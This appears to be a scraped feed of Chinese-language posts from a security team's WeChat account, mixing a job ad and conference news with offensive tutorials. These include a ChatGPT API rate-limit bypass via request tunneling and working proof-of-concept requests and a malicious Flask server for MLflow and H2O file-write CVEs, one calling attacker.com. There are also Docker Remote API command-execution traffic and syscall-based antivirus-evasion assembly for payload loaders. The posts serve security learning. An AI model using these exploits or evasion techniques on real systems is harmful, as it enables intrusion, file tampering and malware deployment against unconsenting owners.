[2]Protect AI | Home：https://protectai.com/

[3]赵月,何锦雯,朱申辰等.大语言模型安全现状与挑战[J].计算机科学,2024,51(01):68-71.

[4]警惕Hugging Face开源组件风险被利用于大模型供应链攻击 - 腾讯安全应急响应中心 (tencent.com)

学习安全五年+，挖洞、传统攻防、安全科研，欢迎扫码了解，有学生优惠

阅读原文

跳转微信打开

ChatGPT中的高级API攻击以及AI供应链漏洞

Sun, 27 Oct 2024 23:13:00 +0800

梅苑 2024-10-27 23:13 广东

让我们跟随梅苑师傅的脚步，一起来研究一下ChatGPT 中的高级 API 攻击以及AI供应链漏洞！

简要说明

人工智能和人工智能的安全性正在以惊人的速度发展，AI模型供应链中使用的工具，用于构建机器学习模型，会使 AI 应用程序容易受到独特的安全威胁。

这些工具是开源的，这意味着它们开箱即用时可能存在漏洞，这些漏洞可直接导致完整的系统接管，例如未经身份验证的远程代码执行或本地文件包含。这意味着可能会面临模型、数据和凭据被盗的风险。

此专题主要目的为拓宽AI供应链安全相关知识。

ChatGPT中的高级API攻击

服务器体系结构导致绕过速率限制
查找 API 异常的技术
未来发现 Bug 的路径

发现应用程序中的异常

像往常一样，我们首先在 Burp Suite 中绘制出所有 ChatGPT 请求，然后启动自动扫描以在 API 中寻找要探索的新兴趣领域。当对像 ChatGPT 这样的成熟 API 运行 BurpSuite 的自动扫描时，我们实际上并不期望它能找到漏洞。相反，我们用它来查找奇怪的响应和错误，这些响应和错误表明我们正在沿着应用程序中可能没有经过良好测试的代码路径行驶。

许多人在执行 API 测试时忽略的一个技巧是在 Logger 选项卡中观察自动请求，并将任何独特或意外的响应发送到 Repeater 选项卡。许多影响最大的漏洞无法通过 Burp Suite 的规则集捕获，需要手动测试。

这篇文章是关于一个这样的案例。

在自动扫描期间观察记录器时，我们会查看两个主要细节：HTTP 状态代码和响应长度。在观看在 ChatGPT 的 API 上运行的高度定制的 Burp Suite 扫描时，出现了一个奇怪的请求：

在 400 个状态代码和 864 个响应长度的海洋中，这个响应脱颖而出，因为它是一个 401 状态代码，并且是唯一一个长度不是 864 字节的请求。它在 Query 列中也有一个字符串，但这是一个任意的 Burp 添加的字符串，所以通常不是那么有趣。

左侧的请求是对 TE 的测试。CL HTTP 请求走私。右侧的响应是对单个请求的两个响应。非常出乎意料的行为。奇怪的是，Burp Suite 并没有将此报告为漏洞，要求我们在观看 Logger 选项卡时保持敏锐的眼光。

继续深入到信息

下一阶段是简化有效负载，以便我们可以更好地了解后端发生的情况。通过一次从请求中缓慢删除一条信息的艰苦过程，我们得出了以下简单的有效负载再现。

现在我们可以开始推断发生了什么。这些请求中的每一个都使用准确的 Content-Length 标头，但未使用正常的双 \r\n 正确终止。前端CloudFlare服务器似乎仅根据Content-Length而不是进一步的分隔符解析出多个请求，然后将分解的请求分别发送到后端服务器。

它不太符合HTTP请求走私的传统定义。当攻击者可以发送有效请求时，就会发生常规 HTTP 请求走私，该请求在前端服务器和后端服务器之间的解析方式不同，导致攻击者或应用程序用户接收他们不打算接收的数据。

最初，这似乎是基于原始异常请求的 HTTP 请求走私，但一旦我们深入研究它，它看起来更像是 HTTP 请求隧道。HTTP 请求隧道是发送打包在单个请求中的多个请求并让后端单独解析它们的能力。它本身并不是一个漏洞，但它是对正常代码路径的有用偏差，通常会导致漏洞利用。

我们尝试了许多不同的方法来利用这一点。使用多个不同的授权令牌，添加新的标头，例如“openai-organization：openai”，将主机标头更改为指向不同的域，在请求其他用户的数据时添加“please”和“thanksyou”。奇怪的架构的一个突出作用是绕过速率限制。

速率限制绕过

通常，我们使用 TurboIntruder 测试速率限制绕过，TurboIntruder 是 Burp Suite 的扩展，它使用自己的自定义网络堆栈以闪电般的速度向服务器发送请求。这未能绕过 text-davinci-edit-001 模型的 20 个请求/分钟限制。

使用 TurboIntruder 时，我们立即命中了 20 个请求，然后收到了所有 429 Rate Limit Exceeded HTTP 响应，表明 API 速率限制按预期执行。

但是，使用堆叠了多个有效负载请求的自定义 Repeater 组，我们在 50 秒内获得了 31 个有效的模型响应。为了避免视觉混乱，下面我们显示了前四个请求和响应，在 20 秒内显示了 24 个有效响应。右下角显示收到的有效 200 OK 响应的数量。

AI供应链漏洞（CVE-2023-6569）

CVE-2023-6569，H2O 是一个开源、分布式、快速和可扩展的机器学习平台：深度学习、梯度提升（GBM）和 XGBoost、随机森林、广义线性建模（GLM with Elastic Net）、K-Means、PCA、广义加法模型（GAM）、RuleFit、支持向量机（SVM）、堆叠集成、自动机器学习（AutoML）等。

它包含一个可通过网络访问的 API 调用，该调用将文件保存到服务器的磁盘，并包括覆盖任意文件的能力。写入磁盘的数据采用 CSV 格式，可防止此攻击用于替换敏感的配置文件（如 SSH 密钥），但可能会覆盖服务器运行所需的系统文件，从而导致拒绝服务。

GET /3/ImportFiles?path=http://attacker.com/somefile HTTP/1.1Host: 127.0.0.1:54321User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer: http://127.0.0.1:54321/flow/index.htmlSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin

覆盖运行 h2o.init（）的用户有权访问的任何任意文件：

POST /3/Frames/someattackerimportedframename/export?path=/etc/passwd&force=true HTTP/1.1Host: 127.0.0.1:54321User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer: http://127.0.0.1:54321/flow/index.htmlSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originContent-Length: 0

攻击者可以控制的数据并不完全是任意的。h2o 将 CSV/XLS/etc 文件写入磁盘，因此攻击者数据用引号括起来，如果它们导出为 CSV，则以“C1”开头。

AI供应链漏洞（CVE-2023-6018）

CVE-2023-6018，MLflow 是一个用于简化机器学习开发的平台，包括跟踪实验、打包代码进入可重现的运行，并共享和部署模型。MLflow 提供了一组轻量级 API，这些 API 可以无论您身在何处，都可以与任何现有的机器学习应用程序或库（TensorFlow、PyTorch、XGBoost 等）一起使用目前运行 ML 代码（例如在笔记本、独立应用程序或云中）。

Web 服务器包括用于跟踪实验、将代码打包到可重现运行以及共享和部署模型的工具。可以使用以下命令运行它

mlflow ui --host 127.0.0.1:5000

从所有提供的功能中，它允许创建 AI 模型。这可以通过向以下 curl 请求发出请求或使用以下 curl 请求来完成：/ajax-api/2.0/mlflow/model-versions/create

curl -X POST -H 'Content-Type: application/json' -d '{"name": "...", "source": "..."}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/model-versions/create'

此终结点采用多个参数，但其中只有 2 个参数对此问题有用：

name：型号名称。

source：模型源。

以下是 source 属性允许的协议：

['', 'file', 's3', 'gs', 'wasbs', 'ftp', 'sftp', 'dbfs', 'hdfs', 'viewfs', 'runs', 'models', 'http', 'https', 'mlflow-artifacts']

在所有这些协议中，本报告将只关注 2 个：

http：提供的 URL 路径必须以开头。https/api/2.0/mlflow-artifacts/artifacts/

models：这是一个自定义包装器，旨在将其链接到另一个模型。

如果创建的模型与另一个具有 .source=models://http:///api/2.0/mlflow-artifacts/artifacts/

在这种情况下，当第一个请求时，它将触发以下代码块：/model-versions/get-artifact?path=...&name=...&version=...

if self._is_directory(artifact_path):    for file_info in self._iter_artifacts_recursive(artifact_path):        if file_info.is_dir:  # Empty directory            os.makedirs(os.path.join(dst_path, file_info.path), exist_ok=True)        else:            fut = _download_file(file_info.path, dst_path)            futures[fut] = file_info.pathelse:    fut = _download_file(artifact_path, dst_path)    futures[fut] = artifact_path

此代码片段将执行以下操作：

1.服务器上的请求（从第二个模型获得的链接）。/api/2.0/mlflow-artifacts/artifactsattacker

2.解析 JSON 响应，该响应必须与以下结构匹配：

{    "files": [        {            "path": "...",            "is_dir": false,            "file_size": 1        }    ]}

对于属性中列出的每个文件，它将获取并写入属性值的输出。由于没有检查，因此可以在系统上创建和控制任何文件，即

files/api/2.0/mlflow-artifacts/artifacts/[path]path/tmp/random

为了滥用此漏洞，必须设置一个恶意的HTTP服务器来控制写入路径和数据。以下一个将用于接下来的 2 个 PoC：

from flask import Flask, jsonify
app = Flask(__name__)app.config["DEBUG"] = True
@app.errorhandler(404)def page_not_found(e):    return "Hello World!"
@app.route("/api/2.0/mlflow-artifacts/artifacts")def index():    return jsonify({        "files": [            {                "path": "/tmp/poc",                "is_dir": False,                "file_size": 50            }        ]    })
app.run("0.0.0.0", 4444)

启动 mlflow Web 服务器：

mlflow ui --host 127.0.0.1:5000

启动攻击服务器：

python run.py

创建已注册的模型：

curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/registered-models/create'

创建第一个模型：（将与恶意服务器相关联）

curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc", "source": "http://127.0.0.1:4444/api/2.0/mlflow-artifacts/artifacts/"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/model-versions/create'

创建第二个模型：（将与第一个模型版本相关联）

curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc", "source": "models:/poc/1"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/model-versions/create'

触发下载：（请求第二个模型）

curl 'http://127.0.0.1:5000/model-versions/get-artifact?path=random&name=poc&version=2'

正如所看到的，被创造出来了！/tmp/poc

翻译参考：

[1]huntr - 世界上第一个用于 AI/ML 的漏洞赏金平台：https://huntr.com/

[2]Protect AI | Home：https://protectai.com/

阅读原文

跳转微信打开

蚂蚁国际信息安全部｜多岗位诚聘安全人才

Mon, 14 Oct 2024 12:54:00 +0800

蚂蚁国际 2024-10-14 12:54 广东

蚂蚁国际信息安全部，欢迎各位师傅投递简历！

蚂蚁国际信息安全部招人，欢迎各位师傅投递简历！

渊龙Sec安全团队可以内推！！！

数字马力

（蚂蚁集团全资技术子公司）

工作地点：长沙

投递方式：zhangyining.zyn@antgroup.com

安全工程师 - 威胁对抗

职位描述

负责云上攻防对抗规则、策略及产品落地
负责业务的攻击检测及应急响应工作

职位要求

熟悉阿里云等公有云，熟练使用常见云安全产品（WAF、FW、堡垒机、云安全中心）
熟悉各种业务攻防技术以及漏洞原理、并能够提出有效的解决方案，有实际攻防经验。

加分项：

具备较强的项目管理能力和产品思维
具备一定的后端或前端开发能力
具备一定网络及故障排查等相关知识

安全工程师 - 应用安全/SDL方向

职位描述

负责蚂蚁国际业务的安全开发生命周期（SDL），涵盖PC端、移动端、小程序的产品架构设计、安全评估、威胁建模及安全测试
完善并建立DevSecOps工具链（包括SAST、IAST、RASP），积极跟进风险处置，撰写相关安全策略
处理Oday漏洞和安全事件响应，进行复盘及运营工作

职位要求

熟悉SDL相关流程，具备实际落地运营经验，了解常见业务安全风险；熟悉SAST、IAST、RASP的原理及应用，有相关产品推动经验优先
拥有丰富的WEB、小程序及移动端安全测试与漏洞挖掘经验（包括黑盒和白盒），具备大型应用项目的安全评估经历；能够独立完成项目的代码审计，精通至少一种编程语言（如JAVA、Node.js）
具备良好的沟通能力，团队合作意识和自我驱动力
精通至少一种编程语言（如JAVA、Node.js）
熟悉IDA Pro、GDB、JEB、Iidb等常用逆向分析工具，具备基本的逆向分析能力，对ARM、x86/64等指令集有一定了解，掌握软件逆向静态分析、动态调试、代码跟踪、反编译及Hook注入等技术优先
熟悉阿里云的FW和WAF安全产品，具备复杂策略部署和运营经验
SRC核心白帽子或有过移动端漏洞提报者

云基础设施设施安全工程师

职位描述

负责国际云基础设施安全建设，完善云基础设施安全体系化防护
负责云平台及基础设施安全架构的风险评估，输出安全风险治理方案并推动落地
负责云基础设施安全能力和安全运营平台化工具建设，优化云风险管控与运营效率
跟踪和研究云安全领域及DevSecOps的最新技术和趋势，持续提升蚂蚁国际业务云安全防护水位

职位要求

熟悉阿里云场景下公有云/混合云平台的安全架构、安全策略、最佳实践和标准
对公有云容器安全、K8S安全、云平台安全等有相关研究，熟悉常见漏洞检测和防护方案
在容器安全（镜像安全、网络安全、运行时安全、配置扫描等）一个方面或多个方案有落地经验
熟悉公有云常见安全产品CIEM/CSPM等，对云上防火墙、安全组、身份访问安全等具备使用经验
熟悉至少一种编程语言（如JAVA、PYTHON）
有公有云安全认证证书和云厂商CTF大赛获奖优先
有云原生安全技术经验者优先

数据安全工程师

职位描述

基于蚂蚁国际业务场景，分析评估数据安全的风险现状，设计并推动数据安全保障方案落地
制定运营指标，建设运营平台、流程和策略，降低数据泄露风险，负责数据安全事件响应处置
负责各个业务域的数据风险识别、数据安全风险评估工作

职位要求

计算机、信息安全类相关专业，3年以上信息安全工作经验
熟悉主流的数据安全技术解决方案，包括但不限于权限管理平台、数据加密、数据防泄漏、数据脱敏、API安全、数据资产安全管理等；
熟悉云安全，有云安全经验，阿里云为主
大型企业数据安全管理落地实践工作经验优先
有良好组织协调及跨部门沟通能力，英语可作为日常办公交流语言加分项：拥有CISSP/CISA资质

阅读原文

跳转微信打开

Docker-TCP-Scan 云安全武器流量分析

Tue, 20 Aug 2024 19:31:00 +0800

神风静默 2024-08-20 19:31 广东

让我们跟随神风静默师傅的脚步，深入学习和利用Docker Remote API接口的利用，该缺陷利用容易、危害巨大，要注重云上安全啦~

Docker-TCP-Scan 云安全武器流量分析

随着企业上云逐渐形成了趋势和规模，云安全也成为了新的焦点和『风口』，云上安全越来越重要；在近几年的攻防中『AKSK』、『小程序』、『云上供应链』都已经成为了兵家必争之地和重要突破口

了解过 Docker Remote API 的师傅应该都知道2375端口，2375是Docker远程操控的默认端口，通过这个端口可以直接对远程的docker daemon进行操作；

当主机以 DOCKER_OPTS="-H tcp://0.0.0.0:2375" 这样的配置方式启动Docker时，可以在外部机器对 Docker Remote API 进行直接操作：docker -H tcp://$HOST:2375 ps

但Docker本身没有身份认证的功能，只要能访问到API服务端口，就可以操作Docker！

这就造成了非常严重的漏洞！能够直接通过 Docker Remote API 对相关运行的容器下发恶意命令！网络上对于 Docker Remote API 利用和详细分析的文章几乎没有，本文就曾哥开源的针对 Docker TCP socket 的利用工具 Docker-TCP-Scan 进行详细的攻击流量分析。通过使用 yakit 抓包工具，我们能够获取并解读全程攻击流量，揭示攻击的具体步骤。

同时感谢国际云安全联盟（CSA）渗透测试工作组对本开源工具提出的建议

GitHub地址

AabyssZG/Docker-TCP-Scan: 旨在以攻促防，针对Docker TCP socket的开源利用工具

https://github.com/AabyssZG/Docker-TCP-Scan

使用yakit抓包分析流量获取全攻击流程

攻击流程分析

步骤一：获取 Docker 信息

攻击者通过发送 GET 请求来获取 Docker 容器的详细信息。这一操作利用了 Docker Daemon 的 TCP 端口 (2375)，该端口默认情况下不要求认证，极易被攻击者利用进行信息泄露。

请求内容

GET /containers/json HTTP/1.1
Host: XXXXXXX:2375
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36, Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*

响应内容

HTTP/1.1 200 OK
Api-Version: 1.12
Docker-Experimental: false
Ostype: linux
Server: Docker/1.12 (linux)
Date: Mon, 19 Aug 2024 08:21:25 GMT
Connection: close
Content-Type: application/json
Content-Length: 1170
[
  {
    "Id": "8dfafdbc3a40",
    "Image": "ubuntu:latest",
    "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82",
    "Command": "/bin/hello",
    "Created": 1720106340,
    "Ports": [{ "PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp" }],
    "SizeRw": 12288,
    "Labels": {
      "com.example.vendor": "Acme",
      "com.example.license": "GPL",
      "com.example.version": "1.0"
    },
    "State": "exited",
    "Status": "Exit 0",
    "NetworkSettings": {
      "Networks": {
        "bridge": {
          "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
          "EndpointID": "2cdc4edb1ded3631c81f57966563e5c8525b81121bb3706a9a9a3ae102711f3f",
          "Gateway": "172.17.0.1",
          "IPAddress": "172.17.0.2",
          "IPPrefixLen": 16,
          "IPv6Gateway": "",
          "GlobalIPv6Address": "",
          "MacAddress": "02:42:ac:11:00:02"
        }
      }
    },
    "Mounts": [
      {
        "Name": "fac362...80535",
        "Source": "/data",
        "Destination": "/data",
        "Driver": "local",
        "Mode": "ro,Z",
        "Propagation": ""
      }
    ]
  }
]

解析:
通过这一步骤，攻击者可以获取 Docker 容器的详细信息，包括容器 ID、镜像名称、网络配置等。这些信息将为下一步的恶意操作提供目标。

步骤二：创建执行ID

攻击者接下来会发送 POST 请求，通过 Docker API 创建一个新的执行环境（Exec Instance），并在 Cmd 参数中注入恶意命令（payload）。

请求内容

POST /containers/8dfafdbc3a40/exec HTTP/1.1
Host: XXXXXXX:2375
Content-Type: application/json
User-Agent: python-requests/2.28.2
Accept-Encoding: gzip, deflate, br
Accept: */*
Content-Length: 63
{ "Cmd": ["pwd"], "AttachStdout": true, "AttachStderr": true }

响应内容

HTTP/1.1 201 Created
Api-Version: 1.12
Docker-Experimental: false
Ostype: linux
Server: Docker/1.12 (linux)
Date: Mon, 19 Aug 2024 08:21:38 GMT
Connection: close
Content-Type: application/json
Content-Length: 25
{ "Id": "b90e34656806" }

解析:
这一阶段，攻击者利用 Docker 提供的 API 功能，创建了一个可以执行特定命令的环境，并获取到了执行 ID。这个 ID 将在后续步骤中用于实际的命令执行。

步骤三：执行命令

最后，攻击者利用之前获取的执行 ID，发送 POST 请求执行注入的命令。

请求内容

POST /exec/b90e34656806/start HTTP/1.1
Host: XXXXXXX:2375
Accept: */*
Content-Type: application/json
User-Agent: python-requests/2.28.2
Accept-Encoding: gzip, deflate, br
Content-Length: 34
{ "Detach": false, "Tty": false }

响应内容

HTTP/1.1 200 OK
Api-Version: 1.12
Docker-Experimental: false
Ostype: linux
Server: Docker/1.12 (linux)
Date: Mon, 19 Aug 2024 08:21:40 GMT
Connection: close
Content-Type: application/octet-stream
Content-Length: 19
/home/root

解析:
通过执行命令，攻击者成功获取了 Docker 容器内部的文件系统信息，验证了其对目标容器的控制权。

攻击流程概述

信息收集: 通过 GET /containers/json 请求，攻击者首先获取 Docker 容器的详细信息，为后续攻击做好准备。
创建执行环境: 使用 POST /containers/{container_id}/exec 请求，攻击者创建了一个可以执行命令的环境，并获取了执行 ID。
执行命令: 通过 POST /exec/{exec_id}/start 请求，攻击者在目标容器内执行了恶意命令，进一步掌控了容器。

此类攻击利用了 Docker Daemon 开放的 TCP 端口，该端口默认情况下不要求认证，极容易被攻击者利用。

阅读原文

跳转微信打开

ISC.AI 2024在京开幕：院士专家共议“安全+AI”发展新路径

Thu, 01 Aug 2024 14:31:00 +0800

ISC平台 2024-08-01 14:31 广东

第十二届互联网安全大会（ISC.AI 2024）在北京国家会议中心盛大开幕，欢迎各位师傅参加~

在ISC.AI 2024互联网安全大会现场

渊龙Sec安全团队出现在国家会议中心🥳

感谢一路上支持和认可我们的师傅！！！

路漫漫其修远兮，吾将上下而求索🙏🙏🙏

7月31日，第十二届互联网安全大会（ISC.AI 2024）在北京国家会议中心盛大开幕。大会由中国互联网协会、中国人工智能学会、中国软件行业协会、360互联网安全中心主办，中国计算机学会计算机安全专业委员会、中国人工智能学会人工智能与安全专业委员会、中国网络空间安全协会人工智能安全治理专业委员会、中关村数智人工智能产业联盟、北京信息化和工业化融合服务联盟、大模型产业联盟承办，ISC平台、红客社区(安全KER社区)、360智脑大模型支持。

随着人工智能等前沿科技的飞速发展，一个崭新的时代拉开序幕，安全与人工智能的融合成为驱动产业发展的关键动力。在此背景下，历经十二载春秋的ISC大会正式升级为ISC.AI 2024，本届大会以“打造安全大模型，引领安全行业革命”为主题，旨在呼吁业界利用大模型重塑安全体系，护航数字经济稳健发展。

构建“安全+AI”创新生态

加速千行百业转型升级

网络安全高质量发展，离不开强大的人才支撑、领先的技术优势和完备的产业体系。中央网络安全和信息化委员会办公室副主任、国家互联网信息办公室副主任王京涛在致辞中表示，要强化协调联动，构建纵深布防的国家网络安全防护体系，突出重点防护，不断提升关键信息基础设施的安全韧性。同时要夯实工作基础，加快构建教育、技术、产业融合发展的良性形态。

民营经济作为推动我国发展不可或缺的力量，在助力网络安全建设，服务网络强国战略方面前景广阔。全国工商联党组成员、副主席汪鸿雁在致辞中表示，相关行业领域的民营企业要主动融入国家战略发展大局，以服务健全国家安全体系、引领新一轮科技革命为目标，积极投身全面深化改革重大战略任务。要练好创新内功，开展基础理论创新，重大问题研究和关键核心技术的攻关。广大科技企业要要坚持科技向上向善，积极参与行业合规建设，不断完善企业治理结构和管理制度。

发展人工智能要坚持“以人为本”，坚持“共同、综合、合作、可持续”的安全观和“科技向善”原则。十三届全国政协社会和法制委员会副主任，中国友谊促进会理事长，公安部原副部长，国家网信办原副主任陈智敏在致辞中指出，在保障好数据安全的前提下，人工智能发展的当务之急是构建与新质生产力相适应的新型生产关系，同时要完善法律制度并加强国际合作。

当前，人工智能迎来了发展与治理协同共进的新阶段。十三届全国人民代表大会社会建设委员会副主任委员，世界互联网大会秘书长，国家网信办原副主任任贤良在致辞中指出，要倡导遵守网络空间国际规则，把防控网络安全风险放在人工智能发展与治理的重要位置。此外，广大安全企业应以技术为本，深入研究人工智能等重点领域，构建跨领域、多层次的数字安全技术产品和服务创新体系，同时注重开放合作，推动协同共治。

“AI+安全”将进一步激发更多网络安全防护新需求，催生网络安全新技术、新产品、新模式。工业和信息化部网络安全管理局局长隋静在致辞中表示，未来将加快培育新支柱新赛道，推动安全产品集约化、高端化智能化发展。促进供需两端有效对接，强化新型工业化保障能力。此外，在积极防范人工智能等新技术带来的安全风险，持续开展筑网系列实网攻防演练的同时，加强网络协同，构建产业生态。

当前，推动人工智能技术和数字安全融合发展成为助力数字化建设、提速数字经济发展的关键。北京市经济和信息化局党组成员、副局长顾瑾栩在致辞中表示，北京要发挥首都核心优势，加强创新体系建设，提升创新产业发展能级，完善创新产业生态，为首都数字经济高质量发展提供强劲动能。

朝阳区双轮驱动发展战略以来，人工智能和数字安全产业取得了长足发展，产业集群聚集效应日益显著。北京市朝阳区委常委，区人民政府党组成员、副区长，中关村科技园区朝阳园党工委书记(兼)舒毕磊在致辞中表示，未来朝阳区将一如既往支持以360为代表的创新企业，通过技术创新和携手合作，推动人工智能技术与数字安全融合创新、协同发展，共同构建安全可信、可控的发展生态。

人工智能等前沿数字技术正在重新定义内容的生产与消费模式，大模型在企业运营中的应用日益广泛。中国工程院院士，ISC名誉主席邬贺铨在致辞中指出，大模型提供方与垂直行业合作开发行业大模型，将大模型拆分成模块提供服务，将有利于中小型企业更容易地应用AI大模型。此外，要注重创新升级数字安全防护措施。

“360AI搜索”“360AI浏览器”首秀

打造沉浸式智能化参会体验

作为全球首场数字安全和AI双域盛会，ISC.AI 2024的开幕式备受瞩目。开幕式由360推出的智能大模型——360AI搜索“i搜”全程配合真人主持，这位AI主持人具备强大的大数据处理能力，能够迅速从海量的网页信息中提取答案，并与现场嘉宾进行实时互动。同时，开幕式的另一项创新——360AI浏览器，在多个小模型的支持下，能够在舞台两侧的大屏上实时生成嘉宾的演讲要点，为用户带来了全新的智能化参会体验。

8月1日，人工智能峰会和一系列主题论坛还将呈现更多精彩议题。此外，创新独角兽沙盒大赛、AI体验馆、ISC开讲啦、赛博文化街等特色活动将持续开放。8月2日，ISC.AI 2024上海AI峰会将接棒北京延续精彩。解锁行业大咖前瞻观点，沉浸式体验科技参会，ISC期待与您携手，共同探索“数字安全和人工智能”的领域最前沿。

-END-

阅读原文

跳转微信打开

【文末红包】Syscall免杀的高阶对抗

Thu, 11 Jul 2024 15:30:00 +0800

原创凝 2024-07-11 15:30 广东

让我们跟随团队成员凝师傅的脚步，深入学习Syscall免杀的高阶对抗，从系统底层角度看Syscall整体调用链，从而更深的踏入免杀的大门~

微信公众号：渊龙Sec安全团队
为国之安全而奋斗，为信息安全而发声！
如有问题或建议，请在公众号后台留言
如果你觉得本文对你有帮助，欢迎在文章底部赞赏我们

1# 免杀现状概述

从现在杀软对抗的角度和技术来讲，syscall 可以说是 loader 中一个不可缺少的技术。为什么 syscall 逐渐成为主流？

很早之前杀软其实只会对 kernel32 中一些函数进行 hook，所以恶意程序开发者使用 ntdll 中的函数去实现 loader 的免杀效果是远高于直接或者间接使用 kernel32 中的函数，比如 VirtualAlloc 之类的函数。

我们又不能直接通过动态调用的方式的去加载 ntdll 中的函数，原因是调用链比较明显（使用 GetModuleHandle，GetProcAddress）。

随着时代的进步，逐渐有人创造间接调用这个概念，也就是我们现在熟悉的地狱之门，当然这里我们不再去深度讨论一些关于地狱之门之类的话题。

当然俗话说的好，魔高一尺道高一丈，杀软也已经开始 hook ntdll 了，当然目前来说r3 层 hook 杀软已经不再是主流，像卡巴已经移除了 r3 层的 hook。

注明：本文中的 Syscall 调用适用于任意版本Windows系统，只支持x64系统。

2# Syscall由浅入深

知己知彼，百战不殆。只有深入了解执行架构的相关原理，才能更好的理清楚思路做好免杀。

在Windows系统中，调用 syscalls 充当程序与系统交互的接口，使它们能够请求特定服务，例如读取或写入文件、创建新进程或分配内存。

例如：当调用 WinAPIs 函数时会触发 NtAllocateVirtualMemory 系统调用。然后，此 syscall 将用户在上一个函数调用中提供的参数移动到 Windows内核，执行请求的操作并将结果返回给程序。

所有系统调用都会返回一个指示代码的NTSTATUS 值,如果系统调用成功执行操作，则返回（零）STATUS_SUCCESS。

参考链接：https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55

大多数系统调用都没有在 Microsoft 中记录，因此系统调用模块将参考下面显示的文档：

Undocumented NTinternals：http://undocumented.ntinternals.net/
ReactOS's NTDLL Reference：https://doxygen.reactos.org/dir_a7ad942ac829d916497d820c4a26c555.html

2.1 NTDLL 和系统调用

大多数系统调用都是从 ntdll.dll DLL导出的。

2.2 Zw 与 Nt 系统调用

有两种类型的系统调用，一种以 开头Nt，另一种以 开头Zw。

NT 系统调用是用户模式程序的主要接口，这些是大多数 Windows 程序通常使用的系统调用。
Zw 系统调用是操作系统的低级内核模式接口，它们通常由设备驱动程序和其他需要直接访问操作系统功能的内核模式代码使用。

总而言之，Zw 系统调用在设备驱动程序开发中用于内核模式，而Nt 系统调用则从用户模式程序执行。

虽然可以从用户模式程序中使用两者，但仍然可以实现相同的结果。这可以在下图中注意到，其中同一系统调用的Zw和Nt版本共享相同的函数地址。

2.3 Syscall 结构

系统调用结构通常是相同的，看起来像下面显示的代码片段。

mov r10, rcx
mov eax, SSN
syscall

例如，NtAllocateVirtualMemory 在64位系统上如下所示:

如下 NtProtectVirtualMemory 所示:

2.4 NtAPI调用说明

需要注意，并非所有 NtAPI 都是系统调用！

需要注意的是，虽然某些 NtAPI 返回 NTSTATUS，但它们不一定是系统调用。

这些 NtAPI 可能是 WinAPI 或系统调用使用的低级函数。某些 NtAPI 不属于系统调用的原因，是它们不符合系统调用的结构。

例如没有系统调用编号或 mov r10, rcx 开头缺少通常的指令。下面显示了非系统调用的 NtAPI 的示例：

LdrLoadDll - WinAPI 使用它 LoadLibrary 来将图像加载到调用进程。
SystemFunction032 并且 SystemFunction033 这些 NtAPI 是之前引入的，并执行 RC4 加密/解密操作。
RtlCreateProcessParametersEx - WinAPI 使用它 CreateProcess 来创建进程的参数。

加载动态链接库

LdrLoadDll 的指令如下所示。请注意，它不遵循典型的系统调用结构：

2.5 绕过用户空间系统调用钩子

直接使用系统调用是绕过用户空间钩子的一种方法。例如，在为有效载荷分配内存时使用 NtAllocateVirtualMemory 而不是 WinAPI：

使用直接系统调用
使用间接系统调用
解钩（脱钩）

3# 直接和间接系统调用

3.1 直接系统调用

通过获取用汇编语言编写的 syscall 函数版本，并直接从汇编文件中调用该精心设计的
syscall，可以实现对用户空间 syscall 挂钩的规避。

难点在于确定 syscall 服务编号(SSN)，因为该编号因系统而异。为了克服这个问题，SSN 可以硬编码在汇编文件中，也可以在运行时动态计算。

以下 .asm 文件介绍了汇编文件中精心设计的 syscall 示例。

不同于本课程中之前所做的 NtAllocateVirtualMemory 使用 GetProcAddress 和进行调用 GetModuleHandle，下面的汇编函数可用于获得相同的结果。这样就无需 NtAllocateVirtualMemory 从安装钩子的 NTDLL 地址空间内进行调用，从而避免了钩子。

NtAllocateVirtualMemory PROC
    mov r10, rcx
    mov eax, (ssn of NtAllocateVirtualMemory)
    syscall
    ret
NtAllocateVirtualMemory ENDP
NtProtectVirtualMemory PROC
    mov r10, rcx
    mov eax, (ssn of NtProtectVirtualMemory)
    syscall
    ret
NtProtectVirtualMemory ENDP
// other syscalls ...

此方法被SysWhispers和HellsGate等工具所采用，这两个工具将在后续模块中讨论:

SysWhispers:https://github.com/jthuraisamy/SysWhispers
HellsGate:https://github.com/am0nsec/HellsGate

3.2 间接系统调用

间接系统调用的实现方式与直接系统调用类似，后者必须先手动编写汇编文件。

两者的区别在于，汇编 syscall 函数中没有指令，而是直接跳转到该指令。下图显示了一个直观的表示:

NtAllocateVirtualMemory 和的汇编函数 NtProtectVirtualMemory 如下所示：

NtAllocateVirtualMemory PROC
    mov r10, rcx
    mov eax, (ssn of NtAllocateVirtualMemory)
    jmp (address of a syscall instruction)
    ret
NtAllocateVirtualMemory ENDP
NtProtectVirtualMemory PROC
    mov r10, rcx
    mov eax, (ssn of NtProtectVirtualMemory)
    jmp (address of a syscall instruction)
    ret
NtProtectVirtualMemory ENDP
